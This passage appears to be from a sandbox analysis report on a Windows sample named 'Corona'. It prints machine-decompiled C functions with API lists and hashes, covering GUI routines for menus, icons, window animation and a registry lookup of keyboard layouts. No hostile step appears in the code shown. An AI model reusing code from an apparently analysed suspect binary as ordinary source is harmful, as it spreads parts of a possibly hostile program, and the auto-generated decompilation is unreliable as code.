                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t55 + 0xfffffbf8;
                                  				_push(0x68);
                                  				_t27 = _v8;
                                  				_push(_t27);
                                  				L004060D4();
                                  				_t45 = _t27;
                                  				if(_t45 >= 0x10) {
                                  					_push( &_v1032);
                                  					_push(8);
                                  					_push(0);
                                  					_push(_v8);
                                  					L00406114();
                                  					if(_v1004 != 0xc0c0c0) {
                                  						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                  						_push(8);
                                  						_push(_t45 - 8);
                                  						_push(_v8);
                                  						L00406114();
                                  					} else {
                                  						_push( &_v1004);
                                  						_push(1);
                                  						_push(_t45 - 8);
                                  						_push(_v8);
                                  						L00406114();
                                  						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                  						_push(7);
                                  						_push(_t45 - 7);
                                  						_push(_v8);
                                  						L00406114();
                                  						_push( &_v1000);
                                  						_push(1);
                                  						_push(7);
                                  						_push(_v8);
                                  						L00406114();
                                  					}
                                  				}
                                  				_pop(_t52);
                                  				 *[fs:eax] = _t52;
                                  				_push(E0041DD08);
                                  				_t29 = _v8;
                                  				_push(_t29);
                                  				_push(0);
                                  				L004065C4();
                                  				return _t29;
                                  			}

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041DC32
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041DD01,?,00000000), ref: 0041DC4E
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041DD01,?,00000000), ref: 0041DC6D
                                  • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041DD01,?,00000000), ref: 0041DC91
                                  • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041DD01), ref: 0041DCAF
                                  • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0041DCC3
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041DD01,?,00000000), ref: 0041DCE3
                                  • 72E7B380.USER32(00000000,?,0041DD08,0041DD01,?,00000000), ref: 0041DCFB
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: 61df3c1615a89bef6daede8d5693667e2c5544e3eab6bced7f8ccb98f79293a7
                                  • Instruction ID: 255784562e72748e334826b2f34e1b3fe2587b1faa5496ccafe83d386e29cfa1
                                  • Opcode Fuzzy Hash: 61df3c1615a89bef6daede8d5693667e2c5544e3eab6bced7f8ccb98f79293a7
                                  • Instruction Fuzzy Hash: 312141F1A40208AADB10DBA5CD86FAE72ECEB48704F5104A6F705FB1C1D6799E548B28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0043E11C(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				char _v12;
                                  				char _v13;
                                  				struct tagMENUITEMINFOA _v61;
                                  				char _v68;
                                  				intOrPtr _t103;
                                  				CHAR* _t109;
                                  				char _t115;
                                  				short _t149;
                                  				void* _t154;
                                  				intOrPtr _t161;
                                  				intOrPtr _t184;
                                  				struct HMENU__* _t186;
                                  				int _t190;
                                  				void* _t192;
                                  				intOrPtr _t193;
                                  				void* _t196;
                                  				void* _t205;
                                  
                                  				_t155 = __ecx;
                                  				_v68 = 0;
                                  				_v12 = 0;
                                  				_v5 = __ecx;
                                  				_t186 = __edx;
                                  				_t154 = __eax;
                                  				_push(_t196);
                                  				_push(0x43e377);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t196 + 0xffffffc0;
                                  				if( *((char*)(__eax + 0x3e)) == 0) {
                                  					L22:
                                  					_pop(_t161);
                                  					 *[fs:eax] = _t161;
                                  					_push(0x43e37e);
                                  					E00403E4C( &_v68);
                                  					return E00403E4C( &_v12);
                                  				}
                                  				E00403EE4( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                  				if(E00440098(_t154) <= 0) {
                                  					__eflags =  *((short*)(_t154 + 0x60));
                                  					if( *((short*)(_t154 + 0x60)) == 0) {
                                  						L8:
                                  						if((GetVersion() & 0x000000ff) < 4) {
                                  							_t190 =  *(0x450ba4 + ((E00404258( *((intOrPtr*)(_t154 + 0x30)), 0x43e39c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00450B98 |  *0x00450B88 |  *0x00450B90 | 0x00000400;
                                  							_t103 = E00440098(_t154);
                                  							__eflags = _t103;
                                  							if(_t103 <= 0) {
                                  								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E0040430C(_v12));
                                  							} else {
                                  								_t109 = E0040430C( *((intOrPtr*)(_t154 + 0x30)));
                                  								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0043E62C(_t154), _t109);
                                  							}
                                  							goto L22;
                                  						}
                                  						_v61.cbSize = 0x2c;
                                  						_v61.fMask = 0x3f;
                                  						_t192 = E00440654(_t154);
                                  						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0043FC70(_t154) == 0) {
                                  							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                  								L14:
                                  								_t115 = 0;
                                  								goto L16;
                                  							}
                                  							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                  							if(_t205 == 0) {
                                  								goto L15;
                                  							}
                                  							goto L14;
                                  						} else {
                                  							L15:
                                  							_t115 = 1;
                                  							L16:
                                  							_v13 = _t115;
                                  							_v61.fType =  *(0x450bd8 + ((E00404258( *((intOrPtr*)(_t154 + 0x30)), 0x43e39c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x00450BD0 |  *0x00450BAC |  *0x00450BE0 |  *0x00450BE8;
                                  							_v61.fState =  *0x00450BB8 |  *0x00450BC8 |  *0x00450BC0;
                                  							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                  							_v61.hSubMenu = 0;
                                  							_v61.hbmpChecked = 0;
                                  							_v61.hbmpUnchecked = 0;
                                  							_v61.dwTypeData = E0040430C(_v12);
                                  							if(E00440098(_t154) > 0) {
                                  								_v61.hSubMenu = E0043E62C(_t154);
                                  							}
                                  							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                  							goto L22;
                                  						}
                                  					}
                                  					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                  					__eflags = _t193;
                                  					if(_t193 == 0) {
                                  						L7:
                                  						_push(_v12);
                                  						_push(0x43e390);
                                  						E0043D780( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                  						_push(_v68);
                                  						E004041CC();
                                  						goto L8;
                                  					}
                                  					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                  					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                  						goto L7;
                                  					}
                                  					_t184 =  *0x43d010; // 0x43d05c
                                  					_t149 = E00403288( *((intOrPtr*)(_t193 + 4)), _t184);
                                  					__eflags = _t149;
                                  					if(_t149 != 0) {
                                  						goto L8;
                                  					}
                                  					goto L7;
                                  				}
                                  				_v61.hSubMenu = E0043E62C(_t154);
                                  				goto L8;
                                  			}

                                  APIs
                                  • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0043E2C8
                                  • GetVersion.KERNEL32(00000000,0043E377), ref: 0043E1B8
                                    • Part of subcall function 0043E62C: CreatePopupMenu.USER32(?,0043E333,00000000,00000000,0043E377), ref: 0043E647
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$CreateInsertItemPopupVersion
                                  • String ID: ,$?
                                  • API String ID: 133695497-2308483597
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0041E1F4() {
                                  				struct HINSTANCE__* _t145;
                                  				long _t166;
                                  				intOrPtr _t167;
                                  				intOrPtr _t186;
                                  				void* _t192;
                                  				BYTE* _t193;
                                  				BYTE* _t196;
                                  				intOrPtr _t197;
                                  				void* _t198;
                                  				intOrPtr _t199;
                                  
                                  				 *((intOrPtr*)(_t198 - 0x24)) = 0;
                                  				 *((intOrPtr*)(_t198 - 0x20)) = E0041E068( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
                                  				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
                                  				if(_t192 > 0) {
                                  					_t197 = 1;
                                  					do {
                                  						_t167 = E0041E068( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
                                  						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E0041E074( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
                                  							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
                                  							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
                                  						}
                                  						_t197 = _t197 + 1;
                                  						_t192 = _t192 - 1;
                                  						_t204 = _t192;
                                  					} while (_t192 != 0);
                                  				}
                                  				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
                                  				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
                                  				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
                                  				 *((intOrPtr*)(_t198 - 0x2c)) = E004078A0(( *(_t198 - 0x40))[8], _t204);
                                  				 *[fs:eax] = _t199;
                                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x14))( *[fs:eax], 0x41e3db, _t198);
                                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0xc))();
                                  				E0041DEAC( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
                                  				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
                                  				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
                                  				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
                                  				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
                                  				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
                                  				 *(_t198 - 0x30) = E004078A0( *((intOrPtr*)(_t198 - 0x18)), _t204);
                                  				_push(_t198);
                                  				_push(0x41e3b8);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t199;
                                  				_t193 =  *(_t198 - 0x30);
                                  				_t196 =  &(( *(_t198 - 0x30))[_t166]);
                                  				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
                                  				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
                                  				DeleteObject( *(_t198 - 0x34));
                                  				DeleteObject( *(_t198 - 0x38));
                                  				_t145 =  *0x452664; // 0x400000
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
                                  				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
                                  					E0041D61C(_t166);
                                  				}
                                  				_pop(_t186);
                                  				 *[fs:eax] = _t186;
                                  				_push(E0041E3BF);
                                  				return E004026DC( *(_t198 - 0x30));
                                  			}

                                  APIs
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041E2E6
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041E2F5
                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041E346
                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041E354
                                  • DeleteObject.GDI32(?), ref: 0041E35D
                                  • DeleteObject.GDI32(?), ref: 0041E366
                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041E388
                                  Similarity
                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                  • String ID:
                                  • API String ID: 1030595962-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004363D0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr* _v8;
                                  				void _v12;
                                  				intOrPtr _v16;
                                  				int _v24;
                                  				int _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t91;
                                  				void* _t119;
                                  				intOrPtr _t136;
                                  				intOrPtr _t145;
                                  				void* _t148;
                                  
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t119 = __ecx;
                                  				_v8 = __eax;
                                  				_t145 =  *0x451104; // 0x452bb4
                                  				 *((char*)(_v8 + 0x210)) = 1;
                                  				_push(_t148);
                                  				_push(0x4365a9);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t148 + 0xffffffe0;
                                  				E0042E814(_v8, __ecx, __ecx, _t145);
                                  				_v16 = _v16 + 4;
                                  				E0042FA30(_v8,  &_v28);
                                  				if(E0044B814() <  *(_v8 + 0x4c) + _v24) {
                                  					_v24 = E0044B814() -  *(_v8 + 0x4c);
                                  				}
                                  				if(E0044B820() <  *(_v8 + 0x48) + _v28) {
                                  					_v28 = E0044B820() -  *(_v8 + 0x48);
                                  				}
                                  				if(E0044B808() > _v28) {
                                  					_v28 = E0044B808();
                                  				}
                                  				if(E0044B7FC() > _v16) {
                                  					_v16 = E0044B7FC();
                                  				}
                                  				SetWindowPos(E00434EF4(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                  				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E0040410C(_t119) < 0x64 &&  *0x4509d0 != 0) {
                                  					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                  					if(_v12 != 0) {
                                  						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                  						if(_v12 == 0) {
                                  							E00439624( &_v36);
                                  							if(_v32 <= _v24) {
                                  							}
                                  						}
                                  						 *0x4509d0(E00434EF4(_v8), 0x64,  *0x00450AD8 | 0x00040000);
                                  					}
                                  				}
                                  				_t80 =  *0x450fc8; // 0x452bb0
                                  				E00432628(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
                                  				ShowWindow(E00434EF4(_v8), 4);
                                  				 *((intOrPtr*)( *_v8 + 0x7c))();
                                  				_pop(_t136);
                                  				 *[fs:eax] = _t136;
                                  				_push(0x4365b0);
                                  				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                  				_t91 = _v8;
                                  				 *((char*)(_t91 + 0x210)) = 0;
                                  				return _t91;
                                  			}

                                  APIs
                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,004365A9), ref: 004364B5
                                  • GetTickCount.KERNEL32 ref: 004364BA
                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 004364F5
                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043650D
                                  • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00436553
                                  • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,004365A9), ref: 00436576
                                    • Part of subcall function 00439624: GetCursorPos.USER32(?), ref: 00439628
                                  • GetTickCount.KERNEL32 ref: 00436590
                                  Similarity
                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                  • String ID:
                                  • API String ID: 3024527889-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E0044BA60(intOrPtr __eax, void* __ebx, void* __fp0) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void* _v16;
                                  				char _v20;
                                  				void* _v24;
                                  				struct HKL__* _v280;
                                  				char _v536;
                                  				char _v600;
                                  				char _v604;
                                  				char _v608;
                                  				char _v612;
                                  				void* _t60;
                                  				intOrPtr _t106;
                                  				intOrPtr _t111;
                                  				void* _t117;
                                  				void* _t118;
                                  				intOrPtr _t119;
                                  				void* _t129;
                                  
                                  				_t129 = __fp0;
                                  				_t117 = _t118;
                                  				_t119 = _t118 + 0xfffffda0;
                                  				_v612 = 0;
                                  				_v8 = __eax;
                                  				_push(_t117);
                                  				_push(0x44bc0b);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t119;
                                  				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                  					L11:
                                  					_pop(_t106);
                                  					 *[fs:eax] = _t106;
                                  					_push(0x44bc12);
                                  					return E00403E4C( &_v612);
                                  				} else {
                                  					 *((intOrPtr*)(_v8 + 0x34)) = E004030CC(1);
                                  					E00403E4C(_v8 + 0x38);
                                  					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                  					if(_t60 < 0) {
                                  						L10:
                                  						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                  						E00415288( *((intOrPtr*)(_v8 + 0x34)), 1);
                                  						goto L11;
                                  					} else {
                                  						_v20 = _t60 + 1;
                                  						_v24 =  &_v280;
                                  						do {
                                  							if(E00439A94( *_v24) == 0) {
                                  								goto L9;
                                  							} else {
                                  								_v608 =  *_v24;
                                  								_v604 = 0;
                                  								if(RegOpenKeyExA(0x80000002, E004088B8( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                                  									goto L9;
                                  								} else {
                                  									_push(_t117);
                                  									_push(0x44bbc7);
                                  									_push( *[fs:eax]);
                                  									 *[fs:eax] = _t119;
                                  									_v12 = 0x100;
                                  									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                  										E004040BC( &_v612, 0x100,  &_v536);
                                  										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                  										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                  											E004040BC(_v8 + 0x38, 0x100,  &_v536);
                                  										}
                                  									}
                                  									_pop(_t111);
                                  									 *[fs:eax] = _t111;
                                  									_push(0x44bbce);
                                  									return RegCloseKey(_v16);
                                  								}
                                  							}
                                  							goto L12;
                                  							L9:
                                  							_v24 = _v24 + 4;
                                  							_t38 =  &_v20;
                                  							 *_t38 = _v20 - 1;
                                  						} while ( *_t38 != 0);
                                  						goto L10;
                                  					}
                                  				}
                                  				L12:
                                  			}






















                                  APIs
                                  • GetKeyboardLayoutList.USER32(00000040,?,00000000,0044BC0B,?,02131320,?,0044BC6D,00000000,?,00430D2F), ref: 0044BAB6
                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 0044BB1E
                                  • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0044BBC7,?,80000002,00000000), ref: 0044BB58
                                  • RegCloseKey.ADVAPI32(?,0044BBCE,00000000,?,00000100,00000000,0044BBC7,?,80000002,00000000), ref: 0044BBC1
                                  Strings
                                  • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0044BB08
                                  • layout text, xrefs: 0044BB4F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CloseKeyboardLayoutListOpenQueryValue
                                  • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                  • API String ID: 1703357764-2652665750
                                  • Opcode ID: c4617a68c53d41e3543ae32cdc4ad7d4888de782c04551970d85b6d74ee93a60
                                  • Instruction ID: 37df39ee0dc5cc2184b923404b0e7e3260e08d0ff74a2b9b0a7fd4d05cbf1091
                                  • Opcode Fuzzy Hash: c4617a68c53d41e3543ae32cdc4ad7d4888de782c04551970d85b6d74ee93a60
                                  • Instruction Fuzzy Hash: 36414C74A002099FEB11DF95C981B9EB7F8EF48304F5044AAE904A7791D778EE408FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E00420034(void* __eax, void* __edx) {
                                  				BYTE* _v8;
                                  				int _v12;
                                  				struct HDC__* _v16;
                                  				short _v18;
                                  				signed int _v24;
                                  				short _v26;
                                  				short _v28;
                                  				char _v38;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed int _t35;
                                  				struct HDC__* _t43;
                                  				void* _t65;
                                  				intOrPtr _t67;
                                  				intOrPtr _t77;
                                  				void* _t80;
                                  				void* _t83;
                                  				void* _t85;
                                  				intOrPtr _t86;
                                  
                                  				_t83 = _t85;
                                  				_t86 = _t85 + 0xffffffdc;
                                  				_t80 = __edx;
                                  				_t65 = __eax;
                                  				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                  					return __eax;
                                  				} else {
                                  					E00402B18( &_v38, 0x16);
                                  					_t67 =  *((intOrPtr*)(_t65 + 0x28));
                                  					_v38 = 0x9ac6cdd7;
                                  					_t35 =  *((intOrPtr*)(_t67 + 0x18));
                                  					if(_t35 != 0) {
                                  						_v24 = _t35;
                                  					} else {
                                  						_v24 = 0x60;
                                  					}
                                  					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                  					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                  					_t43 = E0041E40C( &_v38);
                                  					_v18 = _t43;
                                  					_push(0);
                                  					L0040638C();
                                  					_v16 = _t43;
                                  					_push(_t83);
                                  					_push(0x42016f);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t86;
                                  					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
                                  					_v8 = E004026BC(_v12);
                                  					_push(_t83);
                                  					_push(0x42014f);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t86;
                                  					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
                                  						E0041D61C(_t67);
                                  					}
                                  					E0041559C(_t80, 0x16,  &_v38);
                                  					E0041559C(_t80, _v12, _v8);
                                  					_pop(_t77);
                                  					 *[fs:eax] = _t77;
                                  					_push(0x420156);
                                  					return E004026DC(_v8);
                                  				}
                                  			}























                                  APIs
                                  • MulDiv.KERNEL32(?,?,000009EC), ref: 00420086
                                  • MulDiv.KERNEL32(?,?,000009EC), ref: 0042009D
                                  • 72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 004200B4
                                  • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,0042016F,?,00000000,?,?,000009EC,?,?,000009EC), ref: 004200D8
                                  • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,0042014F,?,?,00000000,00000000,00000008,?,00000000,0042016F), ref: 0042010B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: BitsFileMeta
                                  • String ID: `
                                  • API String ID: 858000408-2679148245
                                  • Opcode ID: 023f2a71db7b25d756b1804989572081cf7ff648af4b7b628bd86fdea15984d1
                                  • Instruction ID: ca66e32d297c195c30ab6a3d4779e81325931c76c8928defe3e7d1a569e3355c
                                  • Opcode Fuzzy Hash: 023f2a71db7b25d756b1804989572081cf7ff648af4b7b628bd86fdea15984d1
                                  • Instruction Fuzzy Hash: F2316574A00208ABDB00DF95D881AFEB7F8EF49704F514466F904AB296D6399D50CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E0043C580(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				intOrPtr _t9;
                                  				void* _t11;
                                  				intOrPtr _t17;
                                  				void* _t28;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				intOrPtr _t37;
                                  				struct HINSTANCE__* _t41;
                                  				void* _t43;
                                  				intOrPtr _t45;
                                  				intOrPtr _t46;
                                  
                                  				_t45 = _t46;
                                  				_push(__ebx);
                                  				_t43 = __edx;
                                  				_t28 = __eax;
                                  				if( *0x452b98 == 0) {
                                  					 *0x452b98 = E0040BA08("comctl32.dll", __eax);
                                  					if( *0x452b98 >= 0x60000) {
                                  						_t41 = GetModuleHandleA("comctl32.dll");
                                  						if(_t41 != 0) {
                                  							 *0x452b9c = GetProcAddress(_t41, "ImageList_WriteEx");
                                  						}
                                  					}
                                  				}
                                  				_v8 = E00419B90(_t43, 1, 0);
                                  				_push(_t45);
                                  				_push(0x43c67a);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t46;
                                  				if( *0x452b9c == 0) {
                                  					_t9 = _v8;
                                  					if(_t9 != 0) {
                                  						_t9 = _t9 - 0xffffffec;
                                  					}
                                  					_push(_t9);
                                  					_t11 = E0043B4C8(_t28);
                                  					_push(_t11);
                                  					L0042372C();
                                  					if(_t11 == 0) {
                                  						_t33 =  *0x450eac; // 0x41a45c
                                  						E0040B274(_t33, 1);
                                  						E00403888();
                                  					}
                                  				} else {
                                  					_t17 = _v8;
                                  					if(_t17 != 0) {
                                  						_t17 = _t17 - 0xffffffec;
                                  					}
                                  					_push(_t17);
                                  					_push(1);
                                  					_push(E0043B4C8(_t28));
                                  					if( *0x452b9c() != 0) {
                                  						_t34 =  *0x450eac; // 0x41a45c
                                  						E0040B274(_t34, 1);
                                  						E00403888();
                                  					}
                                  				}
                                  				_pop(_t37);
                                  				 *[fs:eax] = _t37;
                                  				_push(0x43c681);
                                  				return E004030FC(_v8);
                                  			}

















                                  APIs
                                    • Part of subcall function 0040BA08: 739414E0.VERSION(00000000,?,00000000,0040BADE), ref: 0040BA4A
                                    • Part of subcall function 0040BA08: 739414C0.VERSION(00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA7F
                                    • Part of subcall function 0040BA08: 73941500.VERSION(?,0040BAF0,?,?,00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA99
                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 0043C5B4
                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 0043C5C5
                                  • 73451DE0.COMCTL32(00000000,?,00000000,0043C67A), ref: 0043C644
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
